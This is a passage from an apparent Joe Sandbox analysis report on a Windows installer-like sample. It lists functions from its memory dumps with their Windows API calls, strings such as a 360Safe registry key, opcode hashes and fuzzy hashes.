DeleteFileW.KERNEL32(?,?,00000000,?), ref: 00AB68C8

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: File$Download$CacheDelete_memset
String ID:
API String ID: 1835763934-0
Opcode ID: 451f133b9410749cc331042312c58f288a60435d932bfb4d52ddd7b8e8ff16bb
Instruction ID: 017396f7344ae50b18f2638d4b1b884434f822f171621997e696767d348844f3
Opcode Fuzzy Hash: 451f133b9410749cc331042312c58f288a60435d932bfb4d52ddd7b8e8ff16bb
Instruction Fuzzy Hash: ED01D671511128AACB20EBA68D05EFFBBFCDF49B54F000061B508D3042E678CE81C6E5

Function 6C655B5C Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C6923D1: __wfsopen.LIBCMT ref: 6C6923DE

__filelength.LIBCMT ref: 6C655B7E
_malloc.LIBCMT ref: 6C655B8D

Part of subcall function 6C68D47E: __FF_MSGBANNER.LIBCMT ref: 6C68D4A1
Part of subcall function 6C68D47E: __NMSG_WRITE.LIBCMT ref: 6C68D4A8
Part of subcall function 6C68D47E: RtlAllocateHeap.NTDLL(00000000,6C68DF44,?,?,?,?,6C68DF53,?), ref: 6C68D4F5

_memset.LIBCMT ref: 6C655BA1
__fread_nolock.LIBCMT ref: 6C655BAB

Part of subcall function 6C68D548: __lock.LIBCMT ref: 6C68D566
Part of subcall function 6C68D548: ___sbh_find_block.LIBCMT ref: 6C68D571
Part of subcall function 6C68D548: ___sbh_free_block.LIBCMT ref: 6C68D580
Part of subcall function 6C68D548: HeapFree.KERNEL32(00000000,6C68DF53,6C6D5220,0000000C,6C697673,00000000,6C6D5648,0000000C,6C6976AD,6C68DF53,?,?,6C69CAFF,00000004,6C6D57F8,0000000C), ref: 6C68D5B0
Part of subcall function 6C68D548: GetLastError.KERNEL32(?,6C69CAFF,00000004,6C6D57F8,0000000C,6C695FE1,6C68DF53,?,00000000,00000000,00000000,?,6C69AD80,00000001,00000214), ref: 6C68D5C1

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__filelength__fread_nolock__lock__wfsopen_malloc_memset
String ID:
API String ID: 82526466-0
Opcode ID: aa806175e8b1910d399f12bbef8701841ce524835572d25ef3fe34fdad2e64d7
Instruction ID: f25f1a43af75c5d1dc8da3503119df7fba03abf0c26afbf7cdd8a23b0aca2fae
Opcode Fuzzy Hash: aa806175e8b1910d399f12bbef8701841ce524835572d25ef3fe34fdad2e64d7
Instruction Fuzzy Hash: 1301AC725053197FD7149B65DC89EDF3B5CDF42368F20402BF90096A41DB71EA1486BD

Function 00A91F06 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A91F0D

Part of subcall function 00A8DEB6: GetFileAttributesW.KERNEL32(?), ref: 00A8DEBA

_wcsrchr.LIBCMT ref: 00A91F43

Part of subcall function 00A91F06: CreateDirectoryW.KERNEL32(?,00000000), ref: 00A91F75
Part of subcall function 00A91F06: GetLastError.KERNEL32 ref: 00A91F7F

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: AttributesCreateDirectoryErrorFileH_prolog3Last_wcsrchr
String ID:
API String ID: 2010142796-0
Opcode ID: 5535fd92f6f832287ed9f1c6fc6d94ebb6e0dd852b558f378a03cdffc4b39cb4
Instruction ID: 22b6e1a2478d7ed34997e8760ab76f1582f67347d18aacdf2b469c6591d7e69a
Opcode Fuzzy Hash: 5535fd92f6f832287ed9f1c6fc6d94ebb6e0dd852b558f378a03cdffc4b39cb4
Instruction Fuzzy Hash: 9401F730B0411BE7CF217B719E4197E2BA0AF11B91F50442AF509EA191DB348C419791

Function 00AA667F Relevance: 6.0, APIs: 4, Instructions: 43windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(000000CD), ref: 00AA6699
Shell_NotifyIconW.SHELL32(00000001,00000284), ref: 00AA6703
Shell_NotifyIconW.SHELL32(00000000,00000284), ref: 00AA670B
SetTimer.USER32(?,00002711,000007D0,00000000), ref: 00AA671B

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Icon$NotifyShell_$LoadTimer
String ID:
API String ID: 2558709860-0
Opcode ID: d1d0a012752b0550658c3fd8bf5f24ab634a7d146c9f47d98629742e7ccef788
Instruction ID: cb4f862e1d17788692be4be9d623588f800ada202062c720e0792f57f638d48c
Opcode Fuzzy Hash: d1d0a012752b0550658c3fd8bf5f24ab634a7d146c9f47d98629742e7ccef788
Instruction Fuzzy Hash: 44016DB4501701DFE721CF74C888F97BBF9EB49748F00482EE6A9A7281C7B56954CB50

Function 00AB358F Relevance: 6.0, APIs: 4, Instructions: 38windowthreadCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00AB35AF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AB35C0
SetFocus.USER32(?), ref: 00AB35C9
GetCurrentThreadId.KERNEL32 ref: 00AB35D6

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: LongWindow$CurrentFocusThread
String ID:
API String ID: 2448781475-0
Opcode ID: 36b5cce4d421686343fd044337d9849ef717f72c26ff3f477ebe1782cc96832c
Instruction ID: 5e4f11c09be52549cfebe839267630204682738c1fc11c24be48688a78fa9c01
Opcode Fuzzy Hash: 36b5cce4d421686343fd044337d9849ef717f72c26ff3f477ebe1782cc96832c
Instruction Fuzzy Hash: DAF0FC71514610AFD725A760CD05EDF76ACEF05310B108618B82793191DF30EE01DA55

Function 00AC14AF Relevance: 6.0, APIs: 4, Instructions: 29windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32 ref: 00AC14C3
IsWindowEnabled.USER32(?), ref: 00AC14D0
PostMessageW.USER32(?,000008C7,?,?), ref: 00AC14F3
InvalidateRect.USER32(?,00000000,00000001), ref: 00AC1500

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$EnabledInvalidateMessagePostRect
String ID:
API String ID: 2423392173-0
Opcode ID: 6f52d9390b186199b6bdc681d18d2e88776d9363316b45303e21d4c5ee1b9c76
Instruction ID: f2546bcdf198d0a26aa64b9a26130bc3f0ab2bc0b3a751263115b75ffa74a6a1
Opcode Fuzzy Hash: 6f52d9390b186199b6bdc681d18d2e88776d9363316b45303e21d4c5ee1b9c76
Instruction Fuzzy Hash: DBF03A71210B10EBFB325B65DC09FA67BA5BB00705F00081CF2A2DA5A1DAA6E811DBA4

Function 00AFE98B Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__IsNonwritableInCurrentImage.LIBCMT ref: 00AFE99E

Part of subcall function 00B030A0: __FindPESection.LIBCMT ref: 00B030FB

__getptd_noexit.LIBCMT ref: 00AFE9AE
__freeptd.LIBCMT ref: 00AFE9B8
ExitThread.KERNEL32 ref: 00AFE9C1

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
String ID:
API String ID: 3182216644-0
Opcode ID: 7b4bf1bba2ee6583c52aeba4c7931c3f0e40da8f9272d3170e4596da5eaa60f1
Instruction ID: 1ff92fb2cca111b05220bd2afe4c1652ed7afa5024128152c75602fb9f79418e
Opcode Fuzzy Hash: 7b4bf1bba2ee6583c52aeba4c7931c3f0e40da8f9272d3170e4596da5eaa60f1
Instruction Fuzzy Hash: FAD0E261000A09AAEA2477A5ED5AB297AD99B81760F340060BA44A20F1DFF4D8D1C966

Function 6C5EAD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C5EAD6C
PathCombineW.SHLWAPI(?,?,Config\SafeIME.xml), ref: 6C5EAD82

Part of subcall function 6C5EAB57: __EH_prolog3.LIBCMT ref: 6C5EAB5E
Part of subcall function 6C5EAB57: CreateXMLDOMDocument.SITES(00000000,0000003C,6C5EAD96,?,?,Config\SafeIME.xml), ref: 6C5EAB88
Part of subcall function 6C5EAB57: VariantClear.OLEAUT32(?), ref: 6C5EABD3

Strings

Config\SafeIME.xml, xrefs: 6C5EAD74

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: ClearCombineCreateDocumentH_prolog3PathVariant_memset
String ID: Config\SafeIME.xml
API String ID: 3506927742-2267017868
Opcode ID: 30589d21f029f6f26b4b85b154c52cba2609fd14c5baba92ae6616d656b38984
Instruction ID: 0564e0e79551630666d541fe4620747c603c6117e61ea28300160ca1afd3dfe7
Opcode Fuzzy Hash: 30589d21f029f6f26b4b85b154c52cba2609fd14c5baba92ae6616d656b38984
Instruction Fuzzy Hash: 78F01271A01119ABCF60EF649C45F99B7F8AB09608F0045AAA185A6680DE709A4C8BE9

Function 00AB66E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI(80000001,Software\360Safe,EnableUE,?,00000000,?,&pid=,&ver=), ref: 00AB670E

Strings

Software\360Safe, xrefs: 00AB6704
EnableUE, xrefs: 00AB66FF

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Value
String ID: EnableUE$Software\360Safe
API String ID: 3702945584-3756293347
Opcode ID: 661bd4e8e7fe7b35d1d96a4e38cf71aea30368f90d0367eca4fa8ba1102dc358
Instruction ID: a576d03ca888e449f7db4196183a382ac45da40fcb221428cb54a6b1b37bccbb
Opcode Fuzzy Hash: 661bd4e8e7fe7b35d1d96a4e38cf71aea30368f90d0367eca4fa8ba1102dc358
Instruction Fuzzy Hash: 4DE06D72E40208FADB00DBA09C01BCEB7FCAB04715F2081B6A112E2080EA70D744DB50

Function 00AA5AFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AA5B0D
SHAppBarMessage.SHELL32(00000000,?), ref: 00AA5B2F

Strings

$, xrefs: 00AA5B21

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Message_memset
String ID: $
API String ID: 2116056029-3993045852
Opcode ID: 4360712ead88554495c43acd2c3c7bfed7a8f35959caafe46a00016fa1be147e
Instruction ID: 989bb362c05c924ee2e97acc4088de5a1e9d2c28826388f4dbc613825ff302be
Opcode Fuzzy Hash: 4360712ead88554495c43acd2c3c7bfed7a8f35959caafe46a00016fa1be147e
Instruction Fuzzy Hash: 8AE0B8719002189BDB10EB95DD45BDF77F8DB4C714F100155E615B7180D776ED048BE5

Function 6C639C1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9registryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatW.USER32(SitesUI), ref: 6C639C34
SmartDisableIME.SITES ref: 6C639C3F

Strings

SitesUI, xrefs: 6C639C25

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: ClipboardDisableFormatRegisterSmart
String ID: SitesUI
API String ID: 3315930252-1048294868
Opcode ID: 381b62a3a09282fbe3c8dd14bec057c6622a88638d47bfcd9fa8be711fdaabfe
Instruction ID: 26172ec853a0f1a657a20aa2f994dae6ae5759e38eb1c3c53e0e35ebbe8cabf7
Opcode Fuzzy Hash: 381b62a3a09282fbe3c8dd14bec057c6622a88638d47bfcd9fa8be711fdaabfe
Instruction Fuzzy Hash: 14D0C9B0B05618CAEB149F228048B8875B1A74730DF40B62EC00557A40CF7A40488F19

Function 00A92C59 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A92C60

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: cf3f95e98b7fcd95740d9ef7e8e05e76240ad777584e0de849f2030faebb0621
Instruction ID: 029f40826f29907a4b78d1003008ddd1f4246b30770b191a0b8d1f423583633a
Opcode Fuzzy Hash: cf3f95e98b7fcd95740d9ef7e8e05e76240ad777584e0de849f2030faebb0621
Instruction Fuzzy Hash: E9E15975E0060AEFCF14EFA4C981AEDBBF5BF18300F10452DE556A7691EB30AA55CB90

Function 00A72860 Relevance: 4.8, APIs: 3, Instructions: 286COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A728B3
_malloc.LIBCMT ref: 00A729B5
SetLastError.KERNEL32(00000008,00002000,?,00000000), ref: 00A729C5

Part of subcall function 00A75690: _malloc.LIBCMT ref: 00A7569C
Part of subcall function 00A75690: SetLastError.KERNEL32(00000008,00000000,00A7291E,00000000,00002000,?,00000000), ref: 00A756AE

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ErrorLast_malloc$_memset
String ID:
API String ID: 1834304950-0
Opcode ID: 1e202c88c4539fb3b7d18effd02d937852d6f5e7a8127cc940755109d2bb7cf5
Instruction ID: 3975ccbfa5849fe06e9c3acc6dafb015ffe0a2bd868bd0a127dadd081e8bee13
Opcode Fuzzy Hash: 1e202c88c4539fb3b7d18effd02d937852d6f5e7a8127cc940755109d2bb7cf5
Instruction Fuzzy Hash: 3EB162B19083018BD721DF29D981B6BB7E4ABC8754F04CA2DF99D87241E770E949CB93

Function 00A74CB0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00000000,?,00000000,?,?,00A71043,?), ref: 00A74CF6
ReadFile.KERNEL32(?,?,00000008,?,00000000,?,00000000,?,00000000,?,?,00A71043,?), ref: 00A74D13
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,00000000,?,?,00A71043,?), ref: 00A74D98

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: File$Pointer$Read
String ID:
API String ID: 2010065189-0
Opcode ID: 0425f28acb98bee188f6384156cc6763b19b7b553e5f78de9ee4a3c70729b1f2
Instruction ID: 93fd055900755f7a28bcf539b72877c82e3f6d8fab7f34b58e3742feb7594bcc
Opcode Fuzzy Hash: 0425f28acb98bee188f6384156cc6763b19b7b553e5f78de9ee4a3c70729b1f2
Instruction Fuzzy Hash: B2313571608301ABD320DF559D81A2BB7E8FB8CB48F40C92DF59997291EB70DD048B93

Function 00AB5E40 Relevance: 4.6, APIs: 3, Instructions: 92COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000FC), ref: 00AB5EB3
GetWindowLongW.USER32(?,000000FC), ref: 00AB5EDA
SetWindowLongW.USER32(?,000000FC,?), ref: 00AB5EE9

Part of subcall function 00AB5E24: CallWindowProcW.USER32(?,?,?,?,?), ref: 00AB5E36

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$Long$CallProc
String ID:
API String ID: 513923721-0
Opcode ID: ecd4d3b8f7041ea7c21d1d7e43f33e92975287399471064be57017b069056f17
Instruction ID: fd1b6edaa759323d384324ebd64273f55620a19e710a0fc595ae7fb7e79c85d8
Opcode Fuzzy Hash: ecd4d3b8f7041ea7c21d1d7e43f33e92975287399471064be57017b069056f17
Instruction Fuzzy Hash: C4313C71900605EFCF21DF69C8809AABBF9FF48710B108919F966972A1D731EA51DF60

Function 00AC2E41 Relevance: 4.6, APIs: 3, Instructions: 91COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000FC), ref: 00AC2EB2
GetWindowLongW.USER32(?,000000FC), ref: 00AC2ED9
SetWindowLongW.USER32(?,000000FC,?), ref: 00AC2EE8

Part of subcall function 00AC2E1E: CallWindowProcW.USER32(?,?,?,?,?), ref: 00AC2E30

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

